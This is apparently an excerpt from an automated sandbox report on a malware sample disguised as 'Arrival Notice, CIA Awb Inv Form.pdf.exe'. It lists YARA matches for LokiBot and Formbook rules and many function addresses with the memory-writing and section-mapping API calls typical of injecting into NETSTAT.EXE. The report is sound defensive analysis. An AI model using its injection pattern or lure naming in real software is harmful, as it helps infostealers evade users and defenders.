    Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_0040430D
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6CC3A
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6CF85
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B72FF6
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6C7E5
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B70C8F
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B718FC
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B715AA
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6D199
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6FFF2
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6DB02
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB0EAD
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2EE8
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB9ED2
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA42E48
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA20E50
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABEFBF
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB1FC6
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0CF00
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABFF63
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA99C98
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA87CE8
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FCE0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EACACEB
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18CDF
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0AC20
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0C12
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB6C69
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABEC60
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAEC4C
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA12DB0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA09DD0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABFD27
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00D69
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB7D4C
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FAA0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABFA89
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABCA13
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABEA5B
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74BC0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABFB2E
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00B10
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA3DB19
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA798B2
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA16882
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB78F3
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA028C0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB18DA
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0835
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03800
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2E810
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA09870
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1B870
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA75870
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABF872
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E6868
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABE9A6
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FE9A0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA459C0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00680
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA736EC
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABF6F6
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABA6C0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FC6E0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9D62C
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1C600
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA24670
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAD646
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA02760
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0A760
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB6757
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6D480
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00445
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABF5C9
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB75C6
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EACA526
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ED2EC
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB124C
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1380
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABF330
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0E310
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA3508C
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F00A0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB70F1
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0B0D0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAE076
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1B1E0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA051C0
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EF113
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9D130
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC010E
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA4717A
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FAD2EC
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307F330
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307124C
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FB1380
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FCE310
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0308010E
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FCB0D0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0305D130
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FB00A0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF508C
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0300717A
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FDB1E0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC51C0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0306E076
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FAF113
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030770F1
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FBC6E0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03076757
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC0680
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE4670
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FDC600
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0305D62C
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0306D646
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC2760
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FCA760
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307A6C0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030336EC
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307F6F6
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0308A526
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC0445
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030775C6
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307F5C9
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0302D480
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307FB2E
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FDFAA0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03034BC0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307CA13
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307EA5B
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307FA89
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FFDB19
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC0B10
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC28C0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD6882
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC9870
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FDB870
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FA6868
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307E9A6
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030059C0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEE810
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC3800
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03060835
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FBE9A0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03035870
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307F872
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030398B2
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030718DA
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_030778F3
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FB2EE8
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0303FF40
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC1EB2
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307FF63
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE0E50
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307EFBF
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03071FC6
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC6FE0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03002E48
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03060E6D
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03070EAD
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03079ED2
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FCCF00
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FDFCE0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307FD27
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD8CDF
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03077D4C
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC3C60
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FCAC20
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FB0C12
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0305FDF4
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0303EC20
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC9DD0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0306EC4C
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FD2DB0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0307EC60
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03076C69
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FC0D69
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03059C98
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0308ACEB
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03047CE8
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FBAD00
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281E26E
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281EB52
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281DE3A
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02809E4F
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02809E50
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02802FB0
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02802D87
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02802D90
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02FAB910 appears 268 times
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0303EF10 appears 105 times
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02FF5050 appears 36 times
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03007BE4 appears 96 times
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0302E692 appears 86 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: String function: 1EA47BE4 appears 96 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: String function: 1EA6E692 appears 86 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: String function: 1E9EB910 appears 268 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: String function: 1EA35050 appears 36 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: String function: 1EA7EF10 appears 105 times
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6CC3A NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6CF85 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B72FF6 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6C7E5 NtWriteVirtualMemory,CreateFileA,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B72905 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B70C8F NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B718FC NtWriteVirtualMemory,LoadLibraryA,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6DB02 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32ED0 NtResumeThread,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32E50 NtCreateSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32F00 NtCreateFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32CF0 NtDelayExecution,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32C30 NtMapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32C50 NtUnmapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32DA0 NtReadVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32BC0 NtQueryInformationToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA329F0 NtReadFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32E80 NtCreateProcessEx,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32EC0 NtQuerySection,
